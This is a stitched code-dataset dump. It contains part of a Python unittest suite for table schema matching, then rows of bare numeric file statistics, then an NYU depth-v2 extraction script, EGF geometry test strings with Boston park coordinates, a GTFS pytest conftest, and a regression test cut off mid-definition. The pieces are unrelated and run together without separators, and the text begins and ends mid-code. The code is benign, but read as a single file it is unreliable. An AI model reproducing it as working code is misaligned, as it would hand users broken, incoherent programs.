self.assertEquals(pred_aggregate_table, gold_aggregate_table)
def test_aggregate_tables_order(self):
# test correct ordering of 3+ tables
pass
class ColumnNameSchemaMatcher(unittest.TestCase):
def setUp(self):
self.table_source = Table.create_from_cells([
Cell(tokens=[Token(text='subject')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='header1')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='header2')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='x')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='1')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='2')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='y')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='3')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='4')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='z')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='5')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='6')], rowspan=1, colspan=1)
], nrow=4, ncol=3)
self.table_less_header = Table.create_from_cells([
Cell(tokens=[Token(text='subject')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='header2')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='x')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='1')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='z')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='5')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='y')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='4')], rowspan=1, colspan=1)
], nrow=4, ncol=2)
self.table_more_header = Table.create_from_cells([
Cell(tokens=[Token(text='subject')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='header2')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='header1')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='header3')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='x')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='1')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='1')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='1')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='z')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='5')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='5')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='5')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='y')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='4')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='4')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='4')], rowspan=1, colspan=1)
], nrow=4, ncol=4)
self.table_permute_header = Table.create_from_cells([
Cell(tokens=[Token(text='subject')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='header2')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='header1')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='x')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='1')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='2')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='z')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='5')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='6')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='y')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='3')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='4')], rowspan=1, colspan=1)
], nrow=4, ncol=3)
self.table_no_header = Table.create_from_cells([
Cell(tokens=[Token(text='x')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='1')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='2')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='z')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='5')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='6')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='y')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='3')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='4')], rowspan=1, colspan=1)
], nrow=3, ncol=3)
self.table_only_header = Table.create_from_cells(cells=[
Cell(tokens=[Token(text='subject')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='header1')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='header2')], rowspan=1, colspan=1)
], nrow=1, ncol=3)
def test_map_tables(self):
target_schema_easy = Table.create_from_cells(cells=[
Cell(tokens=[Token(text='subject')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='header1')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='header2')], rowspan=1, colspan=1)
], nrow=1, ncol=3)
target_schema_less = Table.create_from_cells(cells=[
Cell(tokens=[Token(text='subject')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='header2')], rowspan=1, colspan=1)
], nrow=1, ncol=2)
target_schema_more = Table.create_from_cells(cells=[
Cell(tokens=[Token(text='subject')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='header0')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='header1')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='header2')], rowspan=1, colspan=1)
], nrow=1, ncol=4)
target_schema_permuted = Table.create_from_cells(cells=[
Cell(tokens=[Token(text='subject')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='header2')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='header1')], rowspan=1, colspan=1)
], nrow=1, ncol=3)
schema_matcher = ColNameSchemaMatcher()
self.assertListEqual(schema_matcher.map_tables(
tables=[self.table_source],
target_schema=target_schema_easy
),
[
PairwiseMapping(self.table_source,
target_schema_easy,
score=2.0,
column_mappings=[(1, 1), (2, 2)])
])
self.assertListEqual(schema_matcher.map_tables(
tables=[self.table_source],
target_schema=target_schema_permuted
),
[
PairwiseMapping(self.table_source,
target_schema_permuted,
score=2.0,
column_mappings=[(1, 2), (2, 1)])
])
self.assertListEqual(schema_matcher.map_tables(
tables=[self.table_source],
target_schema=target_schema_more
),
[
PairwiseMapping(self.table_source,
target_schema_more,
score=2.0,
column_mappings=[(1, 2), (2, 3)])
])
self.assertListEqual(schema_matcher.map_tables(
tables=[self.table_source],
target_schema=target_schema_less
),
[
PairwiseMapping(self.table_source,
target_schema_less,
score=1.0,
column_mappings=[(2, 1)])
])
self.assertListEqual(schema_matcher.map_tables(
tables=[self.table_source,
self.table_less_header,
self.table_more_header],
target_schema=target_schema_permuted
),
[
PairwiseMapping(self.table_source,
target_schema_permuted,
score=2.0,
column_mappings=[(1, 2), (2, 1)]),
PairwiseMapping(self.table_less_header,
target_schema_permuted,
score=1.0,
column_mappings=[(1, 1)]),
PairwiseMapping(self.table_more_header,
target_schema_permuted,
score=2.0,
column_mappings=[(1, 1), (2, 2)]),
])
class ColumnValueSchemaMatcher(unittest.TestCase):
def setUp(self):
self.table_permute_rows = Table.create_from_cells(cells=[
Cell(tokens=[Token(text='subject')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='header1')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='header2')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='z')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='5')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='6')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='y')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='3')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='4')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='x')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='1')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='2')], rowspan=1, colspan=1)
], nrow=4, ncol=3)
self.table_extra_rows = Table.create_from_cells(cells=[
Cell(tokens=[Token(text='subject')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='header1')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='header2')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='x')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='1')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='2')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='y')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='3')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='4')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='z')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='5')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='6')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='w')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='7')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='8')], rowspan=1, colspan=1)
], nrow=5, ncol=3)
self.table_missing_rows = Table.create_from_cells(cells=[
Cell(tokens=[Token(text='subject')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='header1')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='header2')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='x')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='1')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='2')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='y')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='3')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='4')], rowspan=1, colspan=1)
], nrow=3, ncol=3)
| 50.173611
| 77
| 0.554879
| 1,750
| 14,450
| 4.490857
| 0.047429
| 0.175595
| 0.263392
| 0.33363
| 0.882046
| 0.869322
| 0.840819
| 0.836111
| 0.821606
| 0.809391
| 0
| 0.042149
| 0.271003
| 14,450
| 287
| 78
| 50.348432
| 0.703911
| 0.002353
| 0
| 0.707031
| 0
| 0
| 0.030179
| 0
| 0
| 0
| 0
| 0
| 0.023438
| 1
| 0.023438
| false
| 0.003906
| 0.015625
| 0
| 0.050781
| 0.007813
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
b33225ce37303284a53f4130678fc85ff6b91c0c
| 4,410
|
py
|
Python
|
data/nyu-depth-v2/extract.py
|
fferflo/tf-semseg
|
b392cac2e8cca5389e7a099e8f7a87d72f4a70fc
|
[
"MIT"
] | null | null | null |
data/nyu-depth-v2/extract.py
|
fferflo/tf-semseg
|
b392cac2e8cca5389e7a099e8f7a87d72f4a70fc
|
[
"MIT"
] | null | null | null |
data/nyu-depth-v2/extract.py
|
fferflo/tf-semseg
|
b392cac2e8cca5389e7a099e8f7a87d72f4a70fc
|
[
"MIT"
] | null | null | null |
import h5py, imageio, argparse, os
import numpy as np
parser = argparse.ArgumentParser()
parser.add_argument("--nyu", type=str, required=True, help="Path to nyu_depth_v2_labeled.mat file")
args = parser.parse_args()
map_894_to_40 = np.array([0, 40, 40, 3, 22, 5, 40, 12, 38, 40, 40, 2, 39, 40, 40, 26, 40, 24, 40, 7, 40, 1, 40, 40, 34, 38, 29, 40, 8, 40, 40, 40, 40, 38, 40, 40, 14, 40, 38, 40, 40, 40, 15, 39, 40, 30, 40, 40, 39, 40, 39, 38, 40, 38, 40, 37, 40, 38, 38, 9, 40, 40, 38, 40, 11, 38, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 38, 13, 40, 40, 6, 40, 23, 40, 39, 10, 16, 40, 40, 40, 40, 38, 40, 40, 40, 40, 40, 40, 40, 40, 40, 38, 40, 39, 40, 40, 40, 40, 39, 38, 40, 40, 40, 40, 40, 40, 18, 40, 40, 19, 28, 33, 40, 40, 40, 40, 40, 40, 40, 40, 40, 38, 27, 36, 40, 40, 40, 40, 21, 40, 20, 35, 40, 40, 40, 40, 40, 40, 40, 40, 38, 40, 40, 40, 4, 32, 40, 40, 39, 40, 39, 40, 40, 40, 40, 40, 17, 40, 40, 25, 40, 39, 40, 40, 40, 40, 40, 40, 40, 40, 39, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 39, 40, 40, 40, 40, 40, 40, 40, 40, 40, 39, 38, 38, 40, 40, 39, 40, 39, 40, 38, 39, 38, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 39, 40, 38, 40, 40, 38, 38, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 38, 40, 40, 40, 40, 40, 39, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 39, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 39, 40, 40, 40, 38, 40, 40, 39, 40, 40, 38, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 39, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 31, 40, 40, 40, 40, 40, 40, 40, 38, 40, 40, 38, 39, 39, 40, 40, 40, 40, 40, 40, 40, 40, 40, 38, 40, 39, 40, 40, 39, 40, 40, 40, 38, 40, 40, 40, 40, 40, 40, 40, 40, 38, 39, 40, 40, 40, 40, 40, 40, 38, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 38, 39, 40, 40, 40, 40, 40, 40, 40, 39, 40, 40, 40, 40, 40, 40, 38, 40, 40, 40, 38, 40, 39, 40, 40, 40, 39, 39, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 39, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 39, 39, 40, 40, 39, 39, 40, 40, 40, 40, 38, 40, 40, 38, 39, 39, 40, 39, 40, 39, 38, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 39, 40, 38, 40, 39, 40, 40, 40, 40, 40, 39, 39, 40, 40, 40, 40, 40, 40, 39, 39, 40, 40, 38, 39, 39, 40, 40, 40, 40, 40, 40, 40, 40, 40, 39, 39, 40, 40, 40, 40, 39, 40, 40, 40, 40, 40, 39, 40, 40, 39, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 39, 38, 40, 40, 40, 40, 40, 40, 40, 39, 38, 39, 40, 38, 39, 40, 39, 40, 39, 40, 40, 40, 40, 40, 40, 40, 40, 38, 40, 40, 40, 40, 40, 38, 40, 40, 39, 40, 40, 40, 39, 40, 38, 40, 40, 40, 40, 40, 40, 40, 40, 38, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 39, 38, 40, 40, 38, 40, 40, 38, 40, 40, 40, 40, 40, 40, 40, 40, 40, 39, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 38, 40, 40, 38, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 38, 38, 38, 40, 40, 40, 38, 40, 40, 40, 38, 38, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 38, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 38, 40, 38, 39, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 39, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 39, 40, 39, 40, 40, 40, 40, 38, 38, 40, 40, 40, 38, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 39, 40, 40, 39, 40, 40, 39, 39, 40, 40, 40, 40, 40, 40, 40, 40, 39, 39, 39, 40, 40, 40, 40, 39, 40, 40, 40, 40, 40, 40, 40, 40, 39, 40, 40, 40, 40, 40, 39, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 38, 40, 40, 40, 40, 40, 40, 40, 39, 40, 40, 38, 40, 39, 40, 40, 40, 40, 38, 40, 40, 40, 40, 40, 38, 40, 40, 40, 40, 40, 40, 40, 39, 40, 40, 40, 40, 40, 40, 40, 40, 40, 39, 40, 40])
# Load data
file = h5py.File(args.nyu, mode="r")
color = np.transpose(np.asarray(file["images"][0]), (2, 1, 0))
depth = np.transpose(np.asarray(file["depths"][0]), (1, 0))
labels = np.transpose(np.asarray(file["labels"][0]), (1, 0))
# Process data
depth = (depth * 10000).astype("uint16")
labels = map_894_to_40[labels].astype("uint8")
# Save data
path = os.path.dirname(os.path.abspath(__file__))
imageio.imwrite(os.path.join(path, "color.png"), color)
imageio.imwrite(os.path.join(path, "depth.png"), depth)
imageio.imwrite(os.path.join(path, "labels.png"), labels)
| 176.4
| 3,597
| 0.535147
| 1,026
| 4,410
| 2.285575
| 0.089669
| 0.977399
| 1.210235
| 1.371429
| 0.759062
| 0.721535
| 0.674627
| 0.668657
| 0.666098
| 0.628571
| 0
| 0.530618
| 0.226077
| 4,410
| 24
| 3,598
| 183.75
| 0.156461
| 0.007256
| 0
| 0
| 0
| 0
| 0.022989
| 0.005517
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.125
| 0
| 0.125
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
2fe0955e36b279f30967dd3090b31e43c2bf286b
| 7,582
|
py
|
Python
|
tests/file_formats/variables/egf_vars.py
|
HFM3/strix
|
94bbc568f614bbb0f525d8ce17de4c64ef3b46d2
|
[
"MIT"
] | null | null | null |
tests/file_formats/variables/egf_vars.py
|
HFM3/strix
|
94bbc568f614bbb0f525d8ce17de4c64ef3b46d2
|
[
"MIT"
] | null | null | null |
tests/file_formats/variables/egf_vars.py
|
HFM3/strix
|
94bbc568f614bbb0f525d8ce17de4c64ef3b46d2
|
[
"MIT"
] | null | null | null |
"""
EGF string variables for testing.
"""
# POINT
valid_pt = """PT
Park Name, City, Pond, Fountain
Post office Square, Boston, FALSE, TRUE
42.356243, -71.055631, 2.0
Boston Common, Boston, TRUE, TRUE
42.355465, -71.066412, 10.0
"""
invalid_pt_geom = """PTs
Park Name, City, Pond, Fountain
Post office Square, Boston, FALSE, TRUE
42.356243, -71.055631, 2.0
Boston Common, Boston, TRUE, TRUE
42.355465, -71.066412, 10.0
"""
invalid_pt_last_line_1 = """PT
Park Name, City, Pond, Fountain
Post office Square, Boston, FALSE, TRUE
42.356243, -71.055631, 2.0
Boston Common, Boston, TRUE, TRUE
42.355465, -71.066412, 10.0
"""
invalid_pt_last_line_2 = """PT
Park Name, City, Pond, Fountain
Post office Square, Boston, FALSE, TRUE
42.356243, -71.055631, 2.0
Boston Common, Boston, TRUE, TRUE
42.355465, -71.066412, 10.0
a
"""
invalid_pt_coord_sets = """PT
Park Name, City, Pond, Fountain
Post office Square, Boston, FALSE, TRUE
42.356243, -71.055631, 2.0
42.355465, -71.066412, 10.0
Boston Common, Boston, TRUE, TRUE
42.355465, -71.066412, 10.0
"""
invalid_pt_headers = """PT
Park Name, City, Pond, Fountain
Park Name, City, Pond, Fountain
Post office Square, Boston, FALSE, TRUE
42.356243, -71.055631, 2.0
Boston Common, Boston, TRUE, TRUE
42.355465, -71.066412, 10.0
"""
invalid_pt_sections = """PT
Park Name, City, Pond, Fountain
"""
invalid_pt_section_separators = """PT
Park Name, City, Pond, Fountain
Post office Square, Boston, FALSE, TRUE
42.356243, -71.055631, 2.0
Boston Common, Boston, TRUE, TRUE
42.355465, -71.066412, 10.0
"""
# LINESTRING
valid_ls = """LS
Park Name, Feature Description
Post Office Square, A walk by the fountain
42.356716, -71.055685, 0.0
42.356587, -71.055769, 0.0
42.356566, -71.055754, 0.0
42.356539, -71.055746, 0.0
42.356511, -71.055757, 0.0
42.356495, -71.05579, 0.0
42.356485, -71.05583, 0.0
42.356389, -71.055842, 0.0
42.356252, -71.055796, 0.0
42.356046, -71.055642, 0.0
42.355876, -71.055697, 0.0
42.355828, -71.055758, 0.0
Boston Common, A walk by the fountain
42.356251, -71.062737, 0.0
42.35621, -71.063012, 0.0
42.356153, -71.06305, 0.0
42.356144, -71.063115, 0.0
42.356136, -71.063261, 0.0
42.355825, -71.064018, 0.0
"""
invalid_ls_coord_sets_1 = """LS
Park Name, Feature Description
Post Office Square, A walk by the fountain
42.356716, -71.055685, 0.0
42.356587, -71.055769, 0.0
42.356566, -71.055754, 0.0
42.356539, -71.055746, 0.0
42.356511, -71.055757, 0.0
42.356495, -71.05579, 0.0
42.356485, -71.05583, 0.0
42.356389, -71.055842, 0.0
42.356252, -71.055796, 0.0
42.356046, -71.055642, 0.0
42.355876, -71.055697, 0.0
42.355828, -71.055758, 0.0
Boston Common, A walk by the fountain
42.356251, -71.062737, 0.0
"""
invalid_ls_coord_sets_2 = """LS
Park Name, Feature Description
Post Office Square, A walk by the fountain
42.356716, -71.055685, 0.0
42.356587, -71.055769, 0.0
42.356566, -71.055754, 0.0
42.356539, -71.055746, 0.0
42.356511, -71.055757, 0.0
42.356495, -71.05579, 0.0
42.356485, -71.05583, 0.0
42.356389, -71.055842, 0.0
42.356252, -71.055796, 0.0
42.356046, -71.055642, 0.0
42.355876, -71.055697, 0.0
42.355828, -71.055758, 0.0
Boston Common, A walk by the fountain
42.356251, -71.062737, 0.0
42.35621, -71.063012, 0.0
42.356153, -71.06305, 0.0
42.356144, -71.063115, 0.0
42.356136, -71.063261, 0.0
42.355825, -71.064018, 0.0
"""
invalid_ls_sections = """LS
Park Name, Feature Description
Post Office Square, A walk by the fountain
42.356716, -71.055685, 0.0
42.356587, -71.055769, 0.0
42.356566, -71.055754, 0.0
42.356539, -71.055746, 0.0
42.356511, -71.055757, 0.0
42.356495, -71.05579, 0.0
42.356485, -71.05583, 0.0
42.356389, -71.055842, 0.0
42.356252, -71.055796, 0.0
42.356046, -71.055642, 0.0
42.355876, -71.055697, 0.0
42.355828, -71.055758, 0.0
Boston Common, A walk by the fountain
42.356251, -71.062737, 0.0
42.35621, -71.063012, 0.0
42.356153, -71.06305, 0.0
42.356144, -71.063115, 0.0
42.356136, -71.063261, 0.0
42.355825, -71.064018, 0.0
"""
# POLYGON
valid_poly = """POLY
Park Name, Feature Description
Post Office Square, Boundary of Post Office Square with holes for buildings
42.356856, -71.055757, 0.0
42.35608, -71.054976, 0.0
42.355697, -71.055636, 0.0
42.356003, -71.055941, 0.0
42.356767, -71.05622, 0.0
42.355955, -71.055522, 0.0
42.355894, -71.055458, 0.0
42.355846, -71.055546, 0.0
42.355908, -71.055615, 0.0
42.356089, -71.055312, 0.0
42.356005, -71.055226, 0.0
42.355969, -71.055288, 0.0
42.356058, -71.055373, 0.0
Boston Common, Boundary of Boston Common with a hole for the Frog Pond
42.356514, -71.062157, 0.0
42.355222, -71.063337, 0.0
42.352457, -71.064638, 0.0
42.352639, -71.067238, 0.0
42.356132, -71.06915, 0.0
42.357591, -71.06326, 0.0
42.356047, -71.065045, 0.0
42.355953, -71.065107, 0.0
42.355911, -71.065249, 0.0
42.356018, -71.065909, 0.0
42.35601, -71.066016, 0.0
42.355918, -71.066198, 0.0
42.355854, -71.066417, 0.0
42.355876, -71.066521, 0.0
42.355938, -71.066564, 0.0
42.355985, -71.066547, 0.0
42.356221, -71.066, 0.0
42.356296, -71.065647, 0.0
42.35627, -71.065341, 0.0
42.356186, -71.065127, 0.0
42.356123, -71.065061, 0.0
"""
invalid_poly_coord_sets_1 = """POLY
Park Name, Feature Description
Post Office Square, Boundary of Post Office Square with holes for buildings
42.356856, -71.055757, 0.0
42.35608, -71.054976, 0.0
42.355697, -71.055636, 0.0
42.356003, -71.055941, 0.0
42.356767, -71.05622, 0.0
42.356856, -71.055757, 0.0
42.355955, -71.055522, 0.0
42.355894, -71.055458, 0.0
42.355846, -71.055546, 0.0
42.355908, -71.055615, 0.0
42.355955, -71.055522, 0.0
42.356089, -71.055312, 0.0
42.356005, -71.055226, 0.0
42.355969, -71.055288, 0.0
42.356058, -71.055373, 0.0
42.356089, -71.055312, 0.0
Boston Common, Boundary of Boston Common with a hole for the Frog Pond
42.356514, -71.062157, 0.0
42.355222, -71.063337, 0.0
42.356047, -71.065045, 0.0
42.355953, -71.065107, 0.0
42.355911, -71.065249, 0.0
42.356018, -71.065909, 0.0
42.35601, -71.066016, 0.0
42.355918, -71.066198, 0.0
42.355854, -71.066417, 0.0
42.355876, -71.066521, 0.0
42.355938, -71.066564, 0.0
42.355985, -71.066547, 0.0
42.356221, -71.066, 0.0
42.356296, -71.065647, 0.0
42.35627, -71.065341, 0.0
42.356186, -71.065127, 0.0
42.356123, -71.065061, 0.0
42.356047, -71.065045, 0.0
"""
invalid_poly_coord_sets_2 = """POLY
Park Name, Feature Description
Post Office Square, Boundary of Post Office Square with holes for buildings
42.356856, -71.055757, 0.0
42.35608, -71.054976, 0.0
42.355697, -71.055636, 0.0
42.356003, -71.055941, 0.0
42.356767, -71.05622, 0.0
42.356856, -71.055757, 0.0
42.355955, -71.055522, 0.0
42.355894, -71.055458, 0.0
42.355846, -71.055546, 0.0
42.355908, -71.055615, 0.0
42.355955, -71.055522, 0.0
42.356089, -71.055312, 0.0
42.356005, -71.055226, 0.0
42.355969, -71.055288, 0.0
42.356058, -71.055373, 0.0
42.356089, -71.055312, 0.0
Boston Common, Boundary of Boston Common with a hole for the Frog Pond
42.356514, -71.062157, 0.0
42.355222, -71.063337, 0.0
42.352457, -71.064638, 0.0
42.352639, -71.067238, 0.0
42.356132, -71.06915, 0.0
42.357591, -71.06326, 0.0
42.356514, -71.062157, 0.0
42.356047, -71.065045, 0.0
42.355953, -71.065107, 0.0
42.355911, -71.065249, 0.0
42.356018, -71.065909, 0.0
42.35601, -71.066016, 0.0
42.355918, -71.066198, 0.0
42.355854, -71.066417, 0.0
42.355876, -71.066521, 0.0
42.355938, -71.066564, 0.0
42.355985, -71.066547, 0.0
42.356221, -71.066, 0.0
42.356296, -71.065647, 0.0
42.35627, -71.065341, 0.0
42.356186, -71.065127, 0.0
42.356123, -71.065061, 0.0
42.356047, -71.065045, 0.0
"""
| 17.67366
| 75
| 0.680427
| 1,499
| 7,582
| 3.414276
| 0.106738
| 0.067995
| 0.125049
| 0.028136
| 0.96991
| 0.96991
| 0.943142
| 0.940406
| 0.940406
| 0.940406
| 0
| 0.519698
| 0.14297
| 7,582
| 429
| 76
| 17.67366
| 0.267929
| 0.007782
| 0
| 0.939394
| 0
| 0
| 0.939039
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
2fe5fa8c0f690ef86c1d2f99a56c03f36914d199
| 338
|
py
|
Python
|
tests/conftest.py
|
davidkyburz/gtfs-lite
|
cc3a5df7a9e582264130771a688b12eb2ea0c08c
|
[
"MIT"
] | 4
|
2020-06-03T14:44:27.000Z
|
2022-03-24T01:11:04.000Z
|
tests/conftest.py
|
davidkyburz/gtfs-lite
|
cc3a5df7a9e582264130771a688b12eb2ea0c08c
|
[
"MIT"
] | 3
|
2020-06-18T15:48:35.000Z
|
2021-03-31T14:45:13.000Z
|
tests/conftest.py
|
davidkyburz/gtfs-lite
|
cc3a5df7a9e582264130771a688b12eb2ea0c08c
|
[
"MIT"
] | 2
|
2021-03-13T00:15:21.000Z
|
2021-04-13T21:38:23.000Z
|
from datetime import date, time
import pytest
@pytest.fixture
def feed_zipfile():
return r"data/metra_2020-02-23.zip"
@pytest.fixture
def test_date():
return date(2020, 2, 24)
@pytest.fixture
def test_timerange():
return [time(0, 0), time(23, 59)]
@pytest.fixture
def test_stop_ids():
return [time(0, 0), time(23, 59)]
| 18.777778
| 39
| 0.695266
| 55
| 338
| 4.163636
| 0.472727
| 0.227074
| 0.279476
| 0.262009
| 0.174672
| 0.174672
| 0.174672
| 0
| 0
| 0
| 0
| 0.09507
| 0.159763
| 338
| 18
| 40
| 18.777778
| 0.711268
| 0
| 0
| 0.428571
| 0
| 0
| 0.073746
| 0.073746
| 0
| 0
| 0
| 0
| 0
| 1
| 0.285714
| true
| 0
| 0.142857
| 0.285714
| 0.714286
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
641e70a5914ffc3dba0ea328a0529e8b586a37b9
| 2,533
|
py
|
Python
|
tools/fileinfo/features/eziriz-packer-detection/test.py
|
stepanek-m/retdec-regression-tests
|
12b834b14ede2826fec451368fa8192ab00ddadf
|
[
"MIT"
] | null | null | null |
tools/fileinfo/features/eziriz-packer-detection/test.py
|
stepanek-m/retdec-regression-tests
|
12b834b14ede2826fec451368fa8192ab00ddadf
|
[
"MIT"
] | null | null | null |
tools/fileinfo/features/eziriz-packer-detection/test.py
|
stepanek-m/retdec-regression-tests
|
12b834b14ede2826fec451368fa8192ab00ddadf
|
[
"MIT"
] | null | null | null |
from regression_tests import *
class Eziriz42Test(Test):
settings = TestSettings(
tool='fileinfo',
args='--json --verbose',
